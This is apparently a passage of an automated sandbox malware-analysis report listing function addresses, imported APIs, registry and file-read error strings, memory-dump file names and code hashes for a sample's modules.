Instruction Fuzzy Hash: 6DF05E27B1821243F9529B04B4407B9135A1F4577CF4A0931DD4CAB6D2AE3EAC86A306

Function 00007FF6EF6551C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6EF655520

Strings

fs_file_read, xrefs: 00007FF6EF655555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
Instruction ID: f27c1d457d57cf753e759cd64cfd6058fbdbd6a73e999af721828410d372ccfc
Opcode Fuzzy Hash: 0a634cbf67000b6e04af3113307a55f98b113c92dc51018462aa1a852187c35c
Instruction Fuzzy Hash: 65F05E27B1821243F9529B04B4407B9135A1F4577CF4A0932DD4CAB6D2AE3EAC86A306

Function 00007FFE13389D8C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE13389D9D

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

registry_get_value, xrefs: 00007FFE13389DE6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE13389DED

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 9c0b5fabe127716bf8518f75c5551f6d0a8f072a3ba3e7517ce0fd91c10b36ff
Instruction ID: 9ca24cb5e6b1d8c865462555ca8ef95ede873e5e29bf294157c03db1552c3b49
Opcode Fuzzy Hash: 9c0b5fabe127716bf8518f75c5551f6d0a8f072a3ba3e7517ce0fd91c10b36ff
Instruction Fuzzy Hash: D2F0FC12608A069AE5528F41B8403B96145AF547B5F4403B6ED2D66AB0DF2DD9C58708

Function 00007FFE13389D7E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE13389D9D

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

registry_get_value, xrefs: 00007FFE13389DE6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE13389DED

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: ca6dd569a177849d8c2a45a9408bc3dfce42c36ed4bcb66d60c5af44c99c8d6a
Instruction ID: d72ec1da9abd3c5b44f92d9b4daf8c86ab3f0b544120d623b976ffb019553231
Opcode Fuzzy Hash: ca6dd569a177849d8c2a45a9408bc3dfce42c36ed4bcb66d60c5af44c99c8d6a
Instruction Fuzzy Hash: F6F0FC12608A069AE5528F01BC403B92145AF547B5F4403B6ED2D666B0DF2DD9C58308

Function 00007FFE13389E08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE13389D9D

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

registry_get_value, xrefs: 00007FFE13389DE6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE13389DED

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 9a2de95ffd5d781e6813de5ef751d9da9c96fa48fc425b1bbe8cd7e8830a080e
Instruction ID: f70aa63cb50dcbb5c4290fcac9816dc4f89ddf8450a6395e0b1cb112690398ab
Opcode Fuzzy Hash: 9a2de95ffd5d781e6813de5ef751d9da9c96fa48fc425b1bbe8cd7e8830a080e
Instruction Fuzzy Hash: E6F0FC12608B068AE5528F01B8403B92145BF547B5F0803B5ED6D66AB0DF2DD9C99308

Function 00007FFE13389CED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE13389D9D

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

registry_get_value, xrefs: 00007FFE13389DE6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE13389DED

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 3d58607ea008f735c35aa192c444d383010a86a802efbfec2a893f784aca3acb
Instruction ID: 99776bdef0d871cef21211c06c36697b30e2c96492a400ad39d91e6d6d963dd9
Opcode Fuzzy Hash: 3d58607ea008f735c35aa192c444d383010a86a802efbfec2a893f784aca3acb
Instruction Fuzzy Hash: 50F0FC12708B069AE5528F01B8403B92145AF547B5F4403B5ED2D666B0EF2DD9C58308

Function 00007FFE13389CF7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE13389D9D

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

registry_get_value, xrefs: 00007FFE13389DE6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE13389DED

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 864bd6950e4dc7ead035f6458e2f111194ad25b06bbe2de8fa939e0b9dfb6e44
Instruction ID: 65d940cc52556dab5a0b6f0611ea7c6d86dbf246d669f7bde499e44518b53cd3
Opcode Fuzzy Hash: 864bd6950e4dc7ead035f6458e2f111194ad25b06bbe2de8fa939e0b9dfb6e44
Instruction Fuzzy Hash: AFF0FC12608A069AE5528F01FC403B92145BF547B5F4403B5ED2D666F0DF2DD9C98308

Function 00007FFE0E1336AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E1336CD

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E13371D
registry_get_value, xrefs: 00007FFE0E133716

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 1c1351330875f9c8bd18c082cd93de86cb5c94d83726f94722587cab582a8534
Instruction ID: c6980549455a908081297a7fc02616f18d95ee92463df668b6a516ec5bd1331b
Opcode Fuzzy Hash: 1c1351330875f9c8bd18c082cd93de86cb5c94d83726f94722587cab582a8534
Instruction Fuzzy Hash: 6DF09662A0874A42E5528F10B8403BD7255FF45795F480237DDBD4A7B0EF2DD9899304

Function 00007FFE0E1336BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E1336CD

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E13371D
registry_get_value, xrefs: 00007FFE0E133716

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 6d608df275b056a3b713e4e628b86266d21e47831cf3fbb35a0fadee4a8b9b3e
Instruction ID: 3d1ed679577efd7ca5488f16f67e07d3b3000cf0105f9276ec215b1b5381160f
Opcode Fuzzy Hash: 6d608df275b056a3b713e4e628b86266d21e47831cf3fbb35a0fadee4a8b9b3e
Instruction Fuzzy Hash: D6F09662A0874A42E5528F10B8403BD7255FF45795F480237DDBD8A7B0EF2DD9899304

Function 00007FFE0E133738 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E1336CD

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E13371D
registry_get_value, xrefs: 00007FFE0E133716

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 26a5f34eba60c4f72c8ee3af2f195e4e81c90cd8bb8772d263f182db54f5d605
Instruction ID: 6e458d4b588b0bab55ddf354ae1d9277f2075ec22fda83a10abef91f04d62618
Opcode Fuzzy Hash: 26a5f34eba60c4f72c8ee3af2f195e4e81c90cd8bb8772d263f182db54f5d605
Instruction Fuzzy Hash: 03F09662A0874A42E5528F20B8403BD7295FF44795F484237DDFD4A7B0EF2DD9899304

Function 00007FFE0E133627 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E1336CD

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E13371D
registry_get_value, xrefs: 00007FFE0E133716

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 84c111626073ce5c6c6a488b718616bccb97df3eac41e212bff6ccc94375b7de
Instruction ID: 4483d6ca70fa4a04af45bcb4145253897da95d75dad3b00e15abc9181736ccbd
Opcode Fuzzy Hash: 84c111626073ce5c6c6a488b718616bccb97df3eac41e212bff6ccc94375b7de
Instruction Fuzzy Hash: 43F09662A0874A42E5528F10B8403BD7255FF45795F480237DDBD4A6B0EF2DD9899304

Function 00007FFE0E13361D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E1336CD

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E13371D
registry_get_value, xrefs: 00007FFE0E133716

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 66da268986e4be30b64b14f8924397359769a65e1e775faed6dc0f2b83886bee
Instruction ID: 96b24bec71afd87332564ba199949cea2a50fe58fea6cb5ddd0816f0975fa41e
Opcode Fuzzy Hash: 66da268986e4be30b64b14f8924397359769a65e1e775faed6dc0f2b83886bee
Instruction Fuzzy Hash: 41F09662A0874A46E5528F10B8403BD7255FF45795F480237DDBD4A7B1EF2DD9899304

Function 00007FFE126DD6AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE126DD6BD

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126DD70D
registry_get_value, xrefs: 00007FFE126DD706

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 7c4659f02fd35fdcd3290138beeb929024684a99d8d553bee1ea4cda34c7a78e
Instruction ID: 698912519ab9914a966a5bacf9c454f9020624596d0520932c4748a26cfad4a6
Opcode Fuzzy Hash: 7c4659f02fd35fdcd3290138beeb929024684a99d8d553bee1ea4cda34c7a78e
Instruction Fuzzy Hash: 6CF0F663A09A4E47EA52AF02BC407B96254AF807B4F480176ED8D466F0DFADD9858300

Function 00007FFE126DD69E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE126DD6BD

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126DD70D
registry_get_value, xrefs: 00007FFE126DD706

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 51c307131b55aec3c0749a358073cda3b0a5530b3f81b11b4ae0d31ed059fcf9
Instruction ID: b367c8ffffc53270d71765b73de101f1f9e1099e413af286a98707b20ef0cf41
Opcode Fuzzy Hash: 51c307131b55aec3c0749a358073cda3b0a5530b3f81b11b4ae0d31ed059fcf9
Instruction Fuzzy Hash: EEF0F663A09A4E46EA53AF02BC407B92254EF807B4F480176ED8D466F0DFADD9858300

Function 00007FFE126DD728 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE126DD6BD

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126DD70D
registry_get_value, xrefs: 00007FFE126DD706

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 5d0b49dd086e279bc77500168be92721f92f0f72b19a251bde8d8a8182f60467
Instruction ID: 828b369ede411adebf4db7c612642eb5ff342f47b7d05a01018c159a61824c6b
Opcode Fuzzy Hash: 5d0b49dd086e279bc77500168be92721f92f0f72b19a251bde8d8a8182f60467
Instruction Fuzzy Hash: D9F0F063A09B4E46EA52EF02BC407B92254BF807B4F080276ED8D466F0DFADD9899300

Function 00007FFE126DD617 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE126DD6BD

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126DD70D
registry_get_value, xrefs: 00007FFE126DD706

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 0242a6b0b5dd8d2e5d63b5b2d5db992aa3b72a2ac295f431f0aebe6400e05e67
Instruction ID: c1552fd0db36ab6e5fbed404b25998277ddf47bf1fc5f2aa6b6f09775f6b80d9
Opcode Fuzzy Hash: 0242a6b0b5dd8d2e5d63b5b2d5db992aa3b72a2ac295f431f0aebe6400e05e67
Instruction Fuzzy Hash: 62F0F663A09A4E46EA52AF02BC407B92254BF807B4F480175ED8C466F0DFADD9898300

Function 00007FFE126DD60D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE126DD6BD

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
